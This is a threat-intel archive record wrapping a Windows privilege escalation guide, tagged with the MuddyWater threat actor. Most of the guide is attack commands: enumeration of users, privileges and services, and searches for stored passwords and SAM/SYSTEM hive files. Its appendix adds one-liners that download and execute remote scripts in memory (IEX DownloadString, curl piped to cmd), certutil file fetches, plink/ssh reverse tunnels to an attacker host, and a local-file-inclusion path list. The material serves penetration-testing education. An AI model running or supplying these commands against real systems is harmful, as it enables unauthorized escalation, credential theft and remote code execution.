{
	"id": "74299a94-fe2f-4b8f-868d-801cf4f5363c",
	"created_at": "2026-04-06T01:28:49.926596Z",
	"updated_at": "2026-04-10T03:31:16.979816Z",
	"deleted_at": null,
	"sha1_hash": "a9c802e7496e65c94637d748caad63b015fb9b17",
	"title": "Windows Privilege Escalation Guide",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 143635,
	"plain_text": "Windows Privilege Escalation Guide\r\nBy Ryan McFarland\r\nArchived: 2026-04-06 01:18:39 UTC\r\nPrivilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need\r\nto know what to check and look for. This takes familiarity with systems that normally comes along with\r\nexperience. At first, privilege escalation can seem like a daunting task, but after a while you start to filter through\r\nwhat is normal and what isn’t. It eventually becomes easier to know what to look for rather than digging through\r\neverything hoping to find that needle in the haystack. Hopefully this guide will provide a good foundation to build\r\nupon and get you started.\r\nThis guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have\r\nalready seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on\r\nthe enumeration aspect.\r\nNote: I am not an expert and still learning myself.\r\nGuide Layout\r\nIn each section I first provide the old trusted CMD commands and then also a Powershell equivalent for posterity’s\r\nsake. It’s good to have both tools under your belt, and Powershell is much more versatile for scripting than the\r\ntraditional CMD. However, there isn’t a Powershell equivalent for everything (or CMD is still simply easier/better\r\non certain things), so some sections will only contain regular CMD commands.\r\nVersion 1.3 - Last updated October 2018\r\nOperating System\r\nWhat is the OS and architecture? Is it missing any patches?\r\nsysteminfo\r\nwmic qfe\r\nIs there anything interesting in environment variables? 
A domain controller in LOGONSERVER?\r\nset\r\nGet-ChildItem Env: | ft Key,Value\r\nAre there any other connected drives?\r\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\r\nPage 1 of 12\n\nnet use\r\nwmic logicaldisk get caption,description,providername\r\nGet-PSDrive | where {$_.Provider -like \"Microsoft.PowerShell.Core\\FileSystem\"} | ft Name,Root\r\nUsers\r\nWho are you?\r\nwhoami\r\necho %USERNAME%\r\n$env:UserName\r\nAny interesting user privileges? Note: The State column does not mean that the user does or does not have access\r\nto this privilege. If the privilege is listed, then that user has it.\r\nwhoami /priv\r\nWhat users are on the system? Any old user profiles that weren’t cleaned up?\r\nnet users\r\ndir /b /ad \"C:\\Users\\\"\r\ndir /b /ad \"C:\\Documents and Settings\\\" # Windows XP and below\r\nGet-LocalUser | ft Name,Enabled,LastLogon\r\nGet-ChildItem C:\\Users -Force | select Name\r\nIs anyone else logged in?\r\nqwinsta\r\nWhat groups are on the system?\r\nnet localgroup\r\nGet-LocalGroup | ft Name\r\nAre any of the users in the Administrators group?\r\nnet localgroup Administrators\r\nGet-LocalGroupMember Administrators | ft Name, PrincipalSource\r\nAnything in the Registry for User Autologon?\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2\u003enul | findstr \"DefaultUserName Default\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WinLogon' | s\r\nAnything interesting in Credential Manager?\r\ncmdkey /list\r\ndir C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\r\ndir C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\r\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Local\\Microsoft\\Credentials\\\r\nGet-ChildItem -Hidden C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Credentials\\\r\nCan we access 
SAM and SYSTEM files?\r\n%SYSTEMROOT%\\repair\\SAM\r\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM\r\n%SYSTEMROOT%\\System32\\config\\SAM\r\n%SYSTEMROOT%\\repair\\system\r\n%SYSTEMROOT%\\System32\\config\\SYSTEM\r\n%SYSTEMROOT%\\System32\\config\\RegBack\\system\r\nPrograms, Processes, and Services\r\nWhat software is installed?\r\ndir /a \"C:\\Program Files\"\r\ndir /a \"C:\\Program Files (x86)\"\r\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\r\nGet-ChildItem 'C:\\Program Files', 'C:\\Program Files (x86)' | ft Parent,Name,LastWriteTime\r\nGet-ChildItem -path Registry::HKEY_LOCAL_MACHINE\\SOFTWARE | ft Name\r\nAre there any weak folder or file permissions?\r\nFull Permissions for Everyone or Users on Program Folders?\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(F)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(F)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(F)\" | findstr \"BUILTIN\\Users\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(F)\" | findstr \"BUILTIN\\Users\"\r\nModify Permissions for Everyone or Users on Program Folders?\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(M)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(M)\" | findstr \"Everyone\"\r\nicacls \"C:\\Program Files\\*\" 2\u003enul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\r\nicacls \"C:\\Program Files (x86)\\*\" 2\u003enul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\r\nGet-ChildItem 'C:\\Program Files\\*','C:\\Program Files (x86)\\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Whe\r\nGet-ChildItem 'C:\\Program Files\\*','C:\\Program Files (x86)\\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Wher\r\nYou can also upload accesschk from Sysinternals to check for writeable folders and files.\r\naccesschk.exe -qwsu \"Everyone\" 
*\r\naccesschk.exe -qwsu \"Authenticated Users\" *\r\naccesschk.exe -qwsu \"Users\" *\r\nWhat are the running processes/services on the system? Is there an internal service that isn’t exposed? If so, can we open\r\nit? See Port Forwarding in the Appendix.\r\ntasklist /svc\r\ntasklist /v\r\nnet start\r\nsc query\r\nGet-Process has a -IncludeUserName option to see the process owner; however, you have to have\r\nadministrative rights to use it.\r\nGet-Process | where {$_.ProcessName -notlike \"svchost*\"} | ft ProcessName, Id\r\nGet-Service\r\nThis one-liner returns the process owner without admin rights; if something is blank under owner it’s probably\r\nrunning as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.\r\nGet-WmiObject -Query \"Select * from Win32_Process\" | where {$_.Name -notlike \"svchost*\"} | Select Name, Handle,\r\nAny weak service permissions? Can we reconfigure anything? Again, upload accesschk.\r\naccesschk.exe -uwcqv \"Everyone\" *\r\naccesschk.exe -uwcqv \"Authenticated Users\" *\r\naccesschk.exe -uwcqv \"Users\" *\r\nAre there any unquoted service paths?\r\nwmic service get name,displayname,pathname,startmode 2\u003enul |findstr /i \"Auto\" 2\u003enul |findstr /i /v \"C:\\Windows\\\r\ngwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \"Auto\" -an\r\nWhat scheduled tasks are there? 
Anything custom implemented?\r\nschtasks /query /fo LIST 2\u003enul | findstr TaskName\r\ndir C:\\windows\\tasks\r\nGet-ScheduledTask | where {$_.TaskPath -notlike \"\\Microsoft*\"} | ft TaskName,TaskPath,State\r\nWhat is run at startup?\r\nwmic startup get caption,command\r\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\ndir \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\"\r\ndir \"C:\\Documents and Settings\\%username%\\Start Menu\\Programs\\Startup\"\r\nGet-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\r\nGet-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\r\nGet-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\r\nGet-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\r\nGet-ChildItem \"C:\\Users\\All Users\\Start Menu\\Programs\\Startup\"\r\nGet-ChildItem \"C:\\Users\\$env:USERNAME\\Start Menu\\Programs\\Startup\"\r\nIs AlwaysInstallElevated enabled? I have not run across this but it doesn’t hurt to check.\r\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\r\nNetworking\r\nWhat NICs are connected? 
Are there multiple networks?\r\nipconfig /all\r\nGet-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address\r\nGet-DnsClientServerAddress -AddressFamily IPv4 | ft\r\nWhat routes do we have?\r\nroute print\r\nGet-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex\r\nAnything in the ARP cache?\r\narp -a\r\nGet-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State\r\nAre there connections to other hosts?\r\nnetstat -ano\r\nAnything in the hosts file?\r\nC:\\WINDOWS\\System32\\drivers\\etc\\hosts\r\nIs the firewall turned on? If so, what’s configured?\r\nnetsh firewall show state\r\nnetsh firewall show config\r\nnetsh advfirewall firewall show rule name=all\r\nnetsh advfirewall export \"firewall.txt\"\r\nAny other interesting interface configurations?\r\nnetsh dump\r\nAre there any SNMP configurations?\r\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP /s\r\nGet-ChildItem -path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SNMP -Recurse\r\nInteresting Files and Sensitive Information\r\nThis section may be a little noisy, so you may want to output commands into txt files to review and parse as you\r\nwish.\r\nAny passwords in the registry?\r\nreg query HKCU /f password /t REG_SZ /s\r\nreg query HKLM /f password /t REG_SZ /s\r\nAre there sysprep or unattend files available that weren’t cleaned up?\r\ndir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2\u003enul\r\nGet-Childitem -Path C:\\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_\r\nIf the server is an IIS webserver, what’s in inetpub? Any hidden directories? 
web.config files?\r\ndir /a C:\\inetpub\\\r\ndir /s web.config\r\nC:\\Windows\\System32\\inetsrv\\config\\applicationHost.config\r\nGet-Childitem -Path C:\\inetpub\\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue\r\nWhat’s in the IIS Logs?\r\nC:\\inetpub\\logs\\LogFiles\\W3SVC1\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\W3SVC2\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\FTPSVC1\\u_ex[YYMMDD].log\r\nC:\\inetpub\\logs\\LogFiles\\FTPSVC2\\u_ex[YYMMDD].log\r\nIs XAMPP, Apache, or PHP installed? Are there any XAMPP, Apache, or PHP configuration files?\r\ndir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf\r\nGet-Childitem -Path C:\\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction\r\nAny Apache web logs?\r\ndir /s access.log error.log\r\nGet-Childitem -Path C:\\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue\r\nAny interesting files to look at? Possibly inside User directories (Desktop, Documents, etc.)?\r\ndir /s *pass* == *vnc* == *.config* 2\u003enul\r\nGet-Childitem -Path C:\\Users\\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue\r\nAny files containing the word password?\r\nfindstr /si password *.xml *.ini *.txt *.config 2\u003enul\r\nGet-ChildItem C:\\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -\r\nAppendix\r\nEnumeration Script\r\nI’ve created a Powershell script which pretty much automates all of the above. You can check it out here.\r\nTransferring Files\r\nAt some point during privilege escalation you will need to get files onto your target. 
Below are some easy ways to\r\ndo so.\r\nPowerShell Cmdlet (Powershell 3.0 and higher)\r\nInvoke-WebRequest \"https://server/filename\" -OutFile \"C:\\Windows\\Temp\\filename\"\r\nPowerShell One-Liner\r\n(New-Object System.Net.WebClient).DownloadFile(\"https://server/filename\", \"C:\\Windows\\Temp\\filename\")\r\nPowerShell One-Line Script Execution in Memory\r\nIEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')\r\nPowerShell with Proxy\r\n$browser = New-Object System.Net.WebClient;\r\n$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;\r\nIEX($browser.DownloadString('https://server/script.ps1'));\r\nPowerShell Script\r\necho $webclient = New-Object System.Net.WebClient \u003e\u003ewget.ps1\r\necho $url = \"http://server/file.exe\" \u003e\u003ewget.ps1\r\necho $file = \"output-file.exe\" \u003e\u003ewget.ps1\r\necho $webclient.DownloadFile($url,$file) \u003e\u003ewget.ps1\r\npowershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1\r\nNon-interactive FTP via text file. 
Useful for when you only have limited command execution. Note the space before the redirect on the first line: in cmd a digit directly in front of \u003e is read as a stream handle, so 21\u003e would drop the port number.\r\necho open 10.10.10.11 21 \u003e ftp.txt\r\necho USER username\u003e\u003e ftp.txt\r\necho mypassword\u003e\u003e ftp.txt\r\necho bin\u003e\u003e ftp.txt\r\necho GET filename\u003e\u003e ftp.txt\r\necho bye\u003e\u003e ftp.txt\r\nftp -v -n -s:ftp.txt\r\nCertUtil\r\ncertutil.exe -urlcache -split -f https://myserver/filename outputfilename\r\nCertutil can also be used for base64 encoding/decoding.\r\ncertutil.exe -encode inputFileName encodedOutputFileName\r\ncertutil.exe -decode encodedInputFileName decodedOutputFileName\r\nStarting with Windows 10 1803 (April 2018 Update) the curl command has been implemented, which gives\r\nanother way to transfer files and even execute them in memory. Piping directly into cmd will run most things, but it\r\nseems like if you have anything other than regular commands in your script, i.e. loops, if statements, etc., it doesn’t\r\nrun them correctly.\r\ncurl http://server/file -o file\r\ncurl http://server/file.bat | cmd\r\nAnd with PowerShell\r\nIEX(curl http://server/script.ps1);Invoke-Blah\r\nPort Forwarding\r\nThis is useful for exposing inside services that aren’t available from outside the machine, normally due to firewall\r\nsettings.\r\nUpload plink.exe to the target.\r\nStart SSH on your attacking machine.\r\nFor example, to expose SMB, on the target run:\r\nplink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS\r\nAs of Windows 10 1803 (April 2018 Update), ssh client is now included and turned on by default! 
So you’re able\r\nto use ssh to do port forwarding right out of the box now. Unlike plink, OpenSSH has no -pw switch; it prompts for the password.\r\nssh -l root -R 445:127.0.0.1:445 YOURIPADDRESS\r\nLocal File Inclusion List\r\nThis is not an exhaustive list; installation directories will vary, and I’ve only listed common ones.\r\nC:\\Apache\\conf\\httpd.conf\r\nC:\\Apache\\logs\\access.log\r\nC:\\Apache\\logs\\error.log\r\nC:\\Apache2\\conf\\httpd.conf\r\nC:\\Apache2\\logs\\access.log\r\nC:\\Apache2\\logs\\error.log\r\nC:\\Apache22\\conf\\httpd.conf\r\nC:\\Apache22\\logs\\access.log\r\nC:\\Apache22\\logs\\error.log\r\nC:\\Apache24\\conf\\httpd.conf\r\nC:\\Apache24\\logs\\access.log\r\nC:\\Apache24\\logs\\error.log\r\nC:\\Documents and Settings\\Administrator\\NTUser.dat\r\nC:\\php\\php.ini\r\nC:\\php4\\php.ini\r\nC:\\php5\\php.ini\r\nC:\\php7\\php.ini\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\conf\\httpd.conf\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\logs\\access.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache\\logs\\error.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\conf\\httpd.conf\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\logs\\access.log\r\nC:\\Program Files (x86)\\Apache Group\\Apache2\\logs\\error.log\r\nc:\\Program Files (x86)\\php\\php.ini\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\httpd.conf\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\logs\\access.log\r\nC:\\Program Files\\Apache Group\\Apache\\conf\\logs\\error.log\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\httpd.conf\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\logs\\access.log\r\nC:\\Program Files\\Apache Group\\Apache2\\conf\\logs\\error.log\r\nC:\\Program Files\\FileZilla Server\\FileZilla Server.xml\r\nC:\\Program Files\\MySQL\\my.cnf\r\nC:\\Program Files\\MySQL\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.0\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\r\nC:\\Program 
Files\\MySQL\\MySQL Server 5.1\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.1\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.5\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.5\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.6\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.6\\my.ini\r\nC:\\Program Files\\MySQL\\MySQL Server 5.7\\my.cnf\r\nC:\\Program Files\\MySQL\\MySQL Server 5.7\\my.ini\r\nC:\\Program Files\\php\\php.ini\r\nC:\\Users\\Administrator\\NTUser.dat\r\nC:\\Windows\\debug\\NetSetup.LOG\r\nC:\\Windows\\Panther\\Unattend\\Unattended.xml\r\nC:\\Windows\\Panther\\Unattended.xml\r\nC:\\Windows\\php.ini\r\nC:\\Windows\\repair\\SAM\r\nC:\\Windows\\repair\\system\r\nC:\\Windows\\System32\\config\\AppEvent.evt\r\nC:\\Windows\\System32\\config\\RegBack\\SAM\r\nC:\\Windows\\System32\\config\\RegBack\\system\r\nC:\\Windows\\System32\\config\\SAM\r\nC:\\Windows\\System32\\config\\SecEvent.evt\r\nC:\\Windows\\System32\\config\\SysEvent.evt\r\nC:\\Windows\\System32\\config\\SYSTEM\r\nC:\\Windows\\System32\\drivers\\etc\\hosts\r\nC:\\Windows\\System32\\winevt\\Logs\\Application.evtx\r\nC:\\Windows\\System32\\winevt\\Logs\\Security.evtx\r\nC:\\Windows\\System32\\winevt\\Logs\\System.evtx\r\nC:\\Windows\\win.ini\r\nC:\\xampp\\apache\\conf\\extra\\httpd-xampp.conf\r\nC:\\xampp\\apache\\conf\\httpd.conf\r\nC:\\xampp\\apache\\logs\\access.log\r\nC:\\xampp\\apache\\logs\\error.log\r\nC:\\xampp\\FileZillaFTP\\FileZilla Server.xml\r\nC:\\xampp\\MercuryMail\\MERCURY.INI\r\nC:\\xampp\\mysql\\bin\\my.ini\r\nC:\\xampp\\php\\php.ini\r\nC:\\xampp\\security\\webdav.htpasswd\r\nC:\\xampp\\sendmail\\sendmail.ini\r\nC:\\xampp\\tomcat\\conf\\server.xml\r\nSource: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"
	],
	"report_names": [
		"2018-01-26-Windows-Privilege-Escalation-Guide"
	],
	"threat_actors": [
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775438929,
	"ts_updated_at": 1775791876,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.pdf",
		"text": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.txt",
		"img": "https://archive.orkl.eu/a9c802e7496e65c94637d748caad63b015fb9b17.jpg"
	}
}